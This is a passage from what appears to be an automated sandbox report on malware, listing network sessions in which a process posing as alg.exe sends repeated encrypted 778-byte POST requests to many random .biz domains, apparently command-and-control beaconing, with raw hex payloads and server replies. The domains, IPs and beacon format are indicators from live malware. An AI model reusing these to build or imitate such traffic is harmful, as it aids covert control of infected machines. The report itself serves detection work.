                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: . j^*8S[&()XE_0.@s~8Ro~i&LYIlwgCl1__^]c^0+_l-TEg_@Bg(7oo!gkaP/M90]9pm3yP;I(AhPMdr@l|w=1|d~/
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.057900906 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7420263dec49470afd28cdab1e6598d2|155.94.241.188|1730129832|1730129832|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        12192.168.2.44974282.112.184.197806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.318017960 CET358OUTPOST /saedqhwkiyelcofi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.318042040 CET778OUTData Raw: ed 03 02 f4 41 1e a8 54 fe 02 00 00 3e 70 51 26 9f 97 3f bc 82 72 fa 9c 18 da fe 9d a8 19 e0 3a bf 42 d7 ac 7b 62 52 5d 66 24 0a c5 48 16 19 fc 86 50 2f a6 02 bb 12 bb cc eb 11 1c f2 de 51 dd b0 73 7d 1a c8 61 85 51 fe e8 8d 5f 99 84 7c 0f 1d 9e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: AT>pQ&?r:B{bR]f$HP/Qs}aQ_|4xg;n`AwLrIq76opm&X)e<au@*ow<roB`\Ge[DcB1Zj9K92/<+'KIfn56$F|GHa


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        13192.168.2.44974782.112.184.197806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884516001 CET348OUTPOST /wxhqgp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884533882 CET778OUTData Raw: 25 d2 ce 00 6b d4 8e b4 fe 02 00 00 2f fd ce d3 11 5e 6c 8b a1 fa 15 ad 03 0e ce 83 7e 64 9a 49 ac d6 d4 a6 c5 94 5f bc 66 12 62 fa 55 f2 40 7e f4 01 52 85 8a 4c 48 d4 a4 0e c4 20 6e 07 ae 11 ce 71 5e 1a c4 a4 9f b2 21 43 61 21 6d 99 12 6a ea 1c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %k/^l~dI_fbU@~RLH nq^!Ca!mjwHoe93{5k5,y~-nWcT$;p~r'm}7Sa['?C"a~njzc6cK|s%tgZF-9s{


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        14192.168.2.44975082.112.184.197806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.482213974 CET361OUTPOST /lxjfxiwwkxywcqoq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.482342958 CET778OUTData Raw: 49 c6 63 3d cf 29 94 dd fe 02 00 00 3f 0b f4 16 c8 8b fb 1e 11 4e af 4c 60 89 37 fc 2f db 64 50 db 8b 03 01 68 82 6d 94 56 e6 2f ae 74 88 51 b6 3e 18 e0 7c 54 e8 61 4d 12 c0 24 67 ce 40 72 b5 de 62 e3 3f aa 07 1c a7 1a 62 f1 06 0a 72 c5 58 d2 42
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Ic=)?NL`7/dPhmV/tQ>|TaM$g@rb?brXBY^W94z%mj2S5a^CR7Bw:,bLV`\ASFuMc/5\2=*5(.:_p`<).} lA~


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        15192.168.2.44975182.112.184.197806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.403403997 CET355OUTPOST /uswmbyvknw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.403445959 CET778OUTData Raw: 99 23 a9 99 76 48 45 e2 fe 02 00 00 06 60 eb c8 ba 75 3c 19 5a 80 69 e8 e0 de bf 75 30 bf 57 8d 7d e3 4e 9b 83 af b6 a1 2c 47 5a 3b e0 8e 52 be 1d f5 b9 5d 4f 15 be b6 e2 f3 70 bf 32 7f eb 74 13 87 0c c5 ba d7 cb 14 7b 8c ce 62 c8 5c 30 84 c8 95
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: #vHE`u<Ziu0W}N,GZ;R]Op2t{b\0F!6^XzJET9$K3])~P-sxdW'qs"\)3o\v(+wHr8c^gr>fC)K#D{mo<b\


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        16192.168.2.44975247.129.31.212806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.742664099 CET346OUTPOST /shm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.742685080 CET778OUTData Raw: 96 fb 44 b2 7a 19 c6 d4 fe 02 00 00 24 74 d3 29 d4 d0 b1 ba 74 51 e7 13 61 78 3e 60 8a 10 63 65 ca 75 47 09 28 10 49 d1 1f b0 91 4f e1 0a c9 7d 55 f9 d1 df 8b 73 23 8a e2 e6 d9 67 0d 9a 48 b6 1c 2d cd 22 a1 8e c6 53 9a d7 c5 d1 78 9b ad a3 f1 08
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Dz$t)tQax>`ceuG(IO}Us#gH-"Sx];i4)q-qP~y^&r[)\VAqd<M`qD@lsre-j~=FiJ4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.204986095 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a1a78966b72a12eb840a028cd377de3e|155.94.241.188|1730129854|1730129854|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        17192.168.2.44975313.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.395889997 CET354OUTPOST /nxomllvrieoy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.395915985 CET778OUTData Raw: 85 f1 65 4c 83 0d 12 8a fe 02 00 00 68 c6 fa e8 6b 5f 9e 23 bf 7e 98 08 5a b8 9a e2 40 98 2e 2a a9 b7 e6 b7 22 d9 f4 ce 39 e1 c4 0e 9f 5b de d4 57 fe c1 7c 80 65 22 8f 2d e8 45 65 7a 0c 42 87 bc 1c 9c ae b0 0d 38 9d b9 77 10 01 4c 5d af 25 f4 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: eLhk_#~Z@.*"9[W|e"-EezB8wL]%cFK-qu!/^CwNH<Rl,s5gs_p uei 8M4?>l16YM>K;)?gz#Nnxk=xbE<nkBF(!a#o$<M
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.850178957 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=99b73fd695da937a58f19adcbad7df1b|155.94.241.188|1730129856|1730129856|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        18192.168.2.44975444.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.984323025 CET361OUTPOST /ywkdmkysrijolmoj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.984335899 CET778OUTData Raw: 22 fc 5b e5 00 78 e9 78 fe 02 00 00 19 ed d3 24 49 5a 4b 47 0a 28 cd 80 81 a1 2c 8a 8a 72 a0 24 9c da cc c4 d4 8b f8 f4 87 c5 55 a0 8b 7f c2 7c 3a ee 7c 0f b6 1b ad 60 9c 77 6a e6 e8 9b 98 f0 f3 6d ea e3 5b 1c d1 86 06 2b 19 dc 59 17 52 f5 06 09
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "[xx$IZKG(,r$U|:|`wjm[+YR&g?BWwKI2/4gc:HR\5$E~/QX@*>`"?<}VfIZG#@c{,0Y-8v~3Y]ba:L`IH>&JbtqKKJ/,^QM
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.641170979 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=58d979b6b712841c85d02cf937b44ee4|155.94.241.188|1730129857|1730129857|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        19192.168.2.44975518.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.816354036 CET345OUTPOST /ws HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.816354036 CET778OUTData Raw: 46 2f bc 6c c9 1b d8 b4 fe 02 00 00 26 1c 38 5f 13 70 e8 b6 e2 09 0e 15 9b ce 45 c2 21 2a 81 92 88 2e 94 6d f3 4b 66 23 b9 4a 81 3f d3 c3 13 e8 6c e1 55 63 b9 7c 80 3c 6e eb ea 96 6c 11 6c 59 56 06 c5 51 01 47 c8 80 8a 4e d7 a8 73 86 5a 1d b3 53
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: F/l&8_pE!*.mKf#J?lUc|<nllYVQGNsZSX=}/zbu\4GZNF^V)q^=)A]$"F9Wlv2Dv4!s~4gJ.5Pbp)p7-t\CxU~>yAXj(cC8AGB-dyLJf
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.262722969 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e85432322b7b03166925383059fd9be5|155.94.241.188|1730129858|1730129858|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        20192.168.2.449756172.234.222.138806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.448924065 CET350OUTPOST /yhrktnvbm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.448924065 CET778OUTData Raw: 80 8d 3a e4 41 c9 45 c4 fe 02 00 00 6e 21 b9 f0 ba 91 34 80 9b 6b dd d5 59 fd ca ad 28 96 cb b5 7a c9 b1 37 7a 5c f2 a6 e3 0b 61 08 67 b9 06 e9 98 ef 88 d1 1f fd 26 8f bb c7 9c cf 02 fa 42 7d 54 3a 76 fc bf 0f bd c8 bd 0e b7 65 cd b1 84 40 54 0d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :AEn!4kY(z7z\ag&B}T:ve@T(claD=lnyI(r}Z} k8p >MN`SR,VJbVc`@o\86I{qsr|e4T"/xbGoFWA,


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        21192.168.2.449757172.234.222.138806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150809050 CET350OUTPOST /mjmfrcmno HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150809050 CET778OUTData Raw: 78 af eb 02 0b f4 5a 32 fe 02 00 00 b1 b0 8a c8 11 2d 45 c2 d3 3a a5 a2 cd 05 06 23 8f c3 52 99 19 1f 64 c3 e8 4c 95 1f e8 be 47 e8 fb 31 b1 3d 7d a2 90 36 cc 7e 8b 9c a9 6c e7 c0 dc 5f af cc 03 f0 8c 75 f0 fd fa 2f 5f de db d4 0a ad 1f 65 53 16
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: xZ2-E:#RdLG1=}6~l_u/_eS[Rn<@fkJe(`gxuR.2U=N4B0+|jq!J!FFK/Vl43ogtF(mcoqj4to:RDpZ^^0Z]fi


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        22192.168.2.44975834.246.200.160806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970911026 CET354OUTPOST /cxtfkubsyhri HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970940113 CET778OUTData Raw: 6a 17 90 92 75 82 ea f3 fe 02 00 00 43 3e f8 65 02 7a b7 19 c9 0f 8d 28 c1 15 7f 0d 19 2e 06 6f d2 a2 93 e9 14 65 d8 89 32 9f d9 5e 7c 6d b8 91 f3 95 bd 75 0e 58 c1 e3 6b c7 e3 68 5c 23 a6 08 03 73 0d 58 4f 7e ae 23 d9 8b f1 c1 89 db 5d 07 5e 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: juC>ez(.oe2^|muXkh\#sXO~#]^_>|UnF1O_9.U6uvm077U\s9Q\5UDs"SJa(kp}g91z"KKy!N km3
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.938535929 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5f30d4eb6048a30e890fae202c76ba6c|155.94.241.188|1730129861|1730129861|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        23192.168.2.44975918.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098999023 CET355OUTPOST /tocvykftorkpni HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.099028111 CET778OUTData Raw: 0c b7 ce 6e 53 09 a6 bd fe 02 00 00 f8 39 da 57 3a 41 b6 b9 a0 37 d8 f9 01 8c 10 8c f9 79 df 47 4e ed be ed 97 a8 55 55 22 24 dd ec 2b a2 2c 3c cc 03 43 27 b1 3c 82 48 c2 81 f1 3f 19 ad 47 81 8e d8 b1 33 72 98 df 38 1e 6c 43 5d 0c d1 f3 94 29 1d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: nS9W:A7yGNUU"$+,<C'<H?G3r8lC])5Z7e0h@\lDhY5yn )(~3;='SL^FM2+guw6J{sV5$AkBN.SP2Tk4Za$3L$2
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.759949923 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8e6981cd0901ea916568cf3c8fe5f088|155.94.241.188|1730129862|1730129862|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
